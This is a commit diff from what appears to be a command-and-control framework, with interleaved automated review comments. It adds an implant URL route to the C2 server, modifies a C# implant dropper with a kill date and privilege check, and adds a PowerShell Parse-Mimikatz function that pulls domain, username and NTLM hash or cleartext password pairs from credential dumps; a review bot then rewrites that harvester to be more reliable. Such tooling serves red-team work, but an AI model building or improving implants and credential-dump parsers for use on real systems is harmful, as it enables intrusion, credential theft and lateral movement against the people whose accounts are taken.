Truncated large output in CSV/HTML to stop this being > 100MB. Re-added Parse-Mimikatz feature. Updated CS dropper to work on Server 2003 with .NET v4.
parent
8a092df9d6
commit
1b76ccfe57
|
@ -149,6 +149,8 @@ class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler):
|
|||
implant_type = "C#"
|
||||
if s.path == ("%s?p?c" % new_implant_url):
|
||||
implant_type = "C#"
|
||||
if s.path == ("%s?d?c" % new_implant_url):
|
||||
implant_type = "C#"
|
||||
|
||||
if implant_type == "C#":
|
||||
cookieVal = (s.cookieHeader).replace("SessionID=","")
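Review bot: The `?p?c` and `?d?c` branches each assign the identical `implant_type = "C#"`, so the new branch (presumably the `?d?c` pair added here) can be folded into the existing test: `if s.path in ("%s?p?c" % new_implant_url, "%s?d?c" % new_implant_url):` followed by the single assignment. On the last line, `(s.cookieHeader).replace("SessionID=","")` strips every occurrence of the key anywhere in the header rather than taking the value of the `SessionID` cookie; if `cookieHeader` is the raw client-supplied `Cookie` header, a real cookie parse would be more robust than string replacement. The enclosing handler method starts outside this hunk.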
|
||||
|
|
|
@ -174,7 +174,13 @@ public class Program
|
|||
{
|
||||
if (Convert.ToDateTime("#REPLACEKILLDATE#") > DateTime.Now)
|
||||
{
|
||||
var u = System.Security.Principal.WindowsIdentity.GetCurrent().Name;
|
||||
var u = "";
|
||||
try
|
||||
{
|
||||
u = System.Security.Principal.WindowsIdentity.GetCurrent().Name;
|
||||
} catch {
|
||||
u = System.Environment.UserName;
|
||||
}
|
||||
if (IsHighIntegrity())
|
||||
u += "*";
|
||||
var dn = System.Environment.UserDomainName;
|
||||
|
|
4
HTML.py
4
HTML.py
|
@ -403,6 +403,10 @@ __________ .__. _________ ________
|
|||
framelen = frame['RandomURI'].count()
|
||||
for x in range(0, framelen):
|
||||
try:
|
||||
if (len(frame['Output'][x]) > 1000032):
|
||||
print "[-] Truncating output as this row is over 10mb:"
|
||||
print frame['Command'][x]
|
||||
frame['Output'][x] = "Truncated"
|
||||
frame['RandomURI'][x]
|
||||
a = get_htmlimplant(str(frame['RandomURI'][x]))
|
||||
frame['RandomURI'][x] = a[11] + "\\" + a[2] + " @ " + a[3]
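Review bot: The threshold and the message disagree: `1000032` is roughly 1 MB, the message says "over 10mb", and the commit message says the goal is to stay under 100 MB, so a reader cannot tell which limit is intended. Pull the number into a named constant and derive the message from it, e.g. `MAX_OUTPUT_LEN = 10 * 1024 * 1024` at module level and `if len(frame['Output'][x]) > MAX_OUTPUT_LEN:` / `print "[-] Truncating output as this row is over %d bytes:" % MAX_OUTPUT_LEN`. If `frame` is a pandas DataFrame (it looks like one from `frame['RandomURI'].count()`), the chained `frame['Output'][x] = "Truncated"` may write to a copy rather than the frame, so `frame.loc[x, 'Output'] = "Truncated"` would be the reliable form. The enclosing function starts outside this hunk.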
|
||||
|
|
|
@ -2743,3 +2743,107 @@ $results = Main;
|
|||
"Hostname: $HostName / $DomainSID";
|
||||
$results
|
||||
}
|
||||
|
||||
|
||||
|
||||
function Parse-Mimikatz {
|
||||
param(
|
||||
[Parameter(
|
||||
Position=0,
|
||||
Mandatory=$true,
|
||||
ValueFromPipeline=$true,
|
||||
ValueFromPipelineByPropertyName=$true)
|
||||
]
|
||||
[String[]]$raw
|
||||
)
|
||||
|
||||
# msv
|
||||
$results = $raw | Select-String -Pattern "(?s)(?<=msv :).*?(?=tspkg :)" -AllMatches | %{$_.matches} | %{$_.value}
|
||||
if($results){
|
||||
foreach($match in $results){
|
||||
if($match.Contains("Domain")){
|
||||
$lines = $match.split("`n")
|
||||
foreach($line in $lines){
|
||||
if ($line.Contains("Username")){
|
||||
$username = $line.split(":")[1].trim()
|
||||
}
|
||||
elseif ($line.Contains("Domain")){
|
||||
$domain = $line.split(":")[1].trim()
|
||||
}
|
||||
elseif ($line.Contains("NTLM")){
|
||||
$password = $line.split(":")[1].trim()
|
||||
}
|
||||
}
|
||||
if ($password -and $($password -ne "(null)") -and (!$username.Contains('$'))){
|
||||
$domain+"\"+$username+":"+$password
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
$results = $raw | Select-String -Pattern "(?s)(?<=tspkg :).*?(?=wdigest :)" -AllMatches | %{$_.matches} | %{$_.value}
|
||||
if($results){
|
||||
foreach($match in $results){
|
||||
if($match.Contains("Domain")){
|
||||
$lines = $match.split("`n")
|
||||
foreach($line in $lines){
|
||||
if ($line.Contains("Username")){
|
||||
$username = $line.split(":")[1].trim()
|
||||
}
|
||||
elseif ($line.Contains("Domain")){
|
||||
$domain = $line.split(":")[1].trim()
|
||||
}
|
||||
elseif ($line.Contains("Password")){
|
||||
$password = $line.split(":")[1].trim()
|
||||
}
|
||||
}
|
||||
if ($password -and $($password -ne "(null)") -and (!$username.Contains('$'))){
|
||||
$domain+"\"+$username+":"+$password
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
$results = $raw | Select-String -Pattern "(?s)(?<=wdigest :).*?(?=kerberos :)" -AllMatches | %{$_.matches} | %{$_.value}
|
||||
if($results){
|
||||
foreach($match in $results){
|
||||
if($match.Contains("Domain")){
|
||||
$lines = $match.split("`n")
|
||||
foreach($line in $lines){
|
||||
if ($line.Contains("Username")){
|
||||
$username = $line.split(":")[1].trim()
|
||||
}
|
||||
elseif ($line.Contains("Domain")){
|
||||
$domain = $line.split(":")[1].trim()
|
||||
}
|
||||
elseif ($line.Contains("Password")){
|
||||
$password = $line.split(":")[1].trim()
|
||||
}
|
||||
}
|
||||
if ($password -and $($password -ne "(null)") -and (!$username.Contains('$'))){
|
||||
$domain+"\"+$username+":"+$password
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
$results = $raw | Select-String -Pattern "(?s)(?<=kerberos :).*?(?=ssp :)" -AllMatches | %{$_.matches} | %{$_.value}
|
||||
if($results){
|
||||
foreach($match in $results){
|
||||
if($match.Contains("Domain")){
|
||||
$lines = $match.split("`n")
|
||||
foreach($line in $lines){
|
||||
if ($line.Contains("Username")){
|
||||
$username = $line.split(":")[1].trim()
|
||||
}
|
||||
elseif ($line.Contains("Domain")){
|
||||
$domain = $line.split(":")[1].trim()
|
||||
}
|
||||
elseif ($line.Contains("Password")){
|
||||
$password = $line.split(":")[1].trim()
|
||||
}
|
||||
}
|
||||
if ($password -and $($password -ne "(null)") -and (!$username.Contains('$'))){
|
||||
$domain+"\"+$username+":"+$password
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
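Review bot: `$username`, `$domain` and `$password` are never reset between matches in any of the four sections, so a match that lacks a `Username` or `NTLM`/`Password` line silently inherits the previous match's values and emits a credential attributed to the wrong account (and on the very first match a missing `Username` line makes `$username.Contains('$')` fail on `$null`). `$line.split(":")[1]` also drops everything after the first `:` inside the value, so a password containing a colon is truncated; splitting on the first colon only (`-split ":", 2`) avoids that. The four blocks differ only in the regex delimiters and the secret's field name, so they can be one loop over a table of sections, which also makes the reset-per-match fix a single change; the rewrite below keeps the output format `DOMAIN\user:secret` and the `(null)` and machine-account (`$`) filters unchanged.
```powershell
function Parse-Mimikatz {
    # … unchanged: param block …

    # Each credential provider section differs only in its delimiters and the name of the secret field.
    $sections = @(
        @{ Pattern = "(?s)(?<=msv :).*?(?=tspkg :)";        Field = "NTLM" },
        @{ Pattern = "(?s)(?<=tspkg :).*?(?=wdigest :)";    Field = "Password" },
        @{ Pattern = "(?s)(?<=wdigest :).*?(?=kerberos :)"; Field = "Password" },
        @{ Pattern = "(?s)(?<=kerberos :).*?(?=ssp :)";     Field = "Password" }
    )
    foreach ($section in $sections) {
        $results = $raw | Select-String -Pattern $section.Pattern -AllMatches | %{$_.matches} | %{$_.value}
        foreach ($match in $results) {
            if (-not $match.Contains("Domain")) { continue }
            # Reset per match so a section missing a Username/secret line cannot inherit the previous match's values.
            $username = $null; $domain = $null; $password = $null
            foreach ($line in $match.split("`n")) {
                # Split on the first ':' only; the secret itself may contain ':'.
                $value = ($line -split ":", 2)[1]
                if ($null -eq $value) { continue }
                if ($line.Contains("Username"))         { $username = $value.trim() }
                elseif ($line.Contains("Domain"))       { $domain   = $value.trim() }
                elseif ($line.Contains($section.Field)) { $password = $value.trim() }
            }
            if ($password -and ($password -ne "(null)") -and $username -and -not $username.Contains('$')) {
                $domain + "\" + $username + ":" + $password
            }
        }
    }
}
```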
|
||||
|
|